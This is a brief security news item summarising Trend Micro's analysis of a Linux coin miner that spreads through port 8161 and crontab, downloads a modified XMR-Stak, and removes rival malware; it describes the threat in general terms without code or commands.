Coin miners have become the new norm in the malware world, and new versions are getting more complex, being able to hide their processes more effectively in order to avoid detection.
But security vendor Trend Micro has recently come across a new Linux coin miner whose purpose isn’t only to run without users being aware of it, but to also remove the other malware and miners that are found on a compromised system.
In an analysis of the script, the security company explains that it uses code from KORKERDS and relies on crontabs to make sure it launches after reboot.
The script that the malware uses for spreading downloads a modified version of XMR-Stak, a cryptocurrency miner that is specifically aimed at Cryptonight currencies and which can use the most CPUs, as well as NVIDIA and AMD GPUs for its processes.
Trend Micro explains that the virus targets systems via IP cameras and web services on TCP port 8161, which the attacker uses to send a crontab file with the purpose of download a shell script.
Once the script reaches a target device, it removes all malware, coin miners, and services associated with these, in an attempt to use all available resources for its own mining tasks. By killing off the other miners and forms of malware on a system, the script makes sure that the resources of the computers are always available for its processes.
Submitted by: Arnfried Walbrecht